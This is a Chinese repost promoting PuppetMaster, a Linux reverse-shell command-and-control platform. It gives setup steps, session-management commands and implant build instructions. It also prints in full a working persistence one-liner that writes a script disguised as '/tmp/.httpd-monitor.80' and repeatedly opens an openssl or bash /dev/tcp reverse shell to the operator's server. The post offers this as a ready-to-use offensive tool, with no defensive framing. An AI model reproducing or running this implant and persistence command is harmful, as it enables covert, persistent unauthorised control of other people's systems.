看前声明:此工具为Rebel开发,本文仅帮朋友推广宣发~有问题请联系作者
项目介绍:Linux反向shell中控平台,主体零第三方依赖及轻量化异步,默认自带无限制持久化,防止任何服务端意外导致权限丢失。
启动流程:
git clone https://github.com/R4be1/PuppetMaster.git
cd PuppetMaster
vim Master.py #这一步是修改host变量为自己的服务器ip
python3 Master.py #启动!而后会给出基础/加密反弹shell的命令
第一次使用注意修改Master主程序中的host变量,把127.0.0.1改为你的服务器公网ip,否则默认持久化命令会将权限持续反弹到127上。
硬性Windows平台用户注意:Windows报错缺少readline库是因为Windows版的Python官方库中不包含readline,在Windows上pip install readline也会报错,如果一定要在Windows平台上跑的话可以把import readline改成第三方库或直接注释readline相关的行(就三行,但会缺少补全功能)
反弹shell后可执行sessions效果如下,包含总会话数,hostname,username,CPU核心数,远程地址,上线时间,ip归属(纯真ip库大概精确到市或单位)
详细使用命令:
Master Console(在控制台时):
-
BATCH-EXECUTE :批量命令执行(目前只支持全部批量,部分批量有待考量)
-
sessions :列出所有会话
-
use :使用指定会话(tab键补全)可使用远程连接的地址如(1.1.1.1:12345)
Session(在使用use之后,可使用bg返回控制台):
-
sessions :列出所有会话
-
execute :命令执行(execute ps -ef)
-
shell :交互式Shell
-
close :关闭当前会话(不会杀掉持久化进程)
-
bg :会话/shell中可回退且不关闭会话
Make Implant:
修改服务端IP:
cd SSL-shell && make linux 即可,而后会生成sslshell这个文件。
持久化作者使用的命令:
[ ! "$(ps -ef|grep /tmp/.httpd-monitor.80|grep -v grep)" ] && echo "while true;do (mkfifo /tmp/-;bash -i</tmp/-|&openssl s_client -quiet -connect 127.0.0.1:47443>/tmp/-;rm /tmp/-)||(bash -i>&/dev/tcp/127.0.0.1/47080 0>&1);sleep 474;done;">/tmp/.httpd-monitor.80 && chmod +x /tmp/.httpd-monitor.80 && (nohup bash /tmp/.httpd-monitor.80 >/dev/null 2>&1 &)
解析:先判断进程中是否存在/tmp/.httpd-monitor.80特征,而后每474秒循环反弹shell(如果加密shell没报错则优先加密shell,否则基础反弹shell)
原文始发于微信公众号(樱花庄的本间白猫):【非作者-非原创】PuppetMaster-Linux C2端项目
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论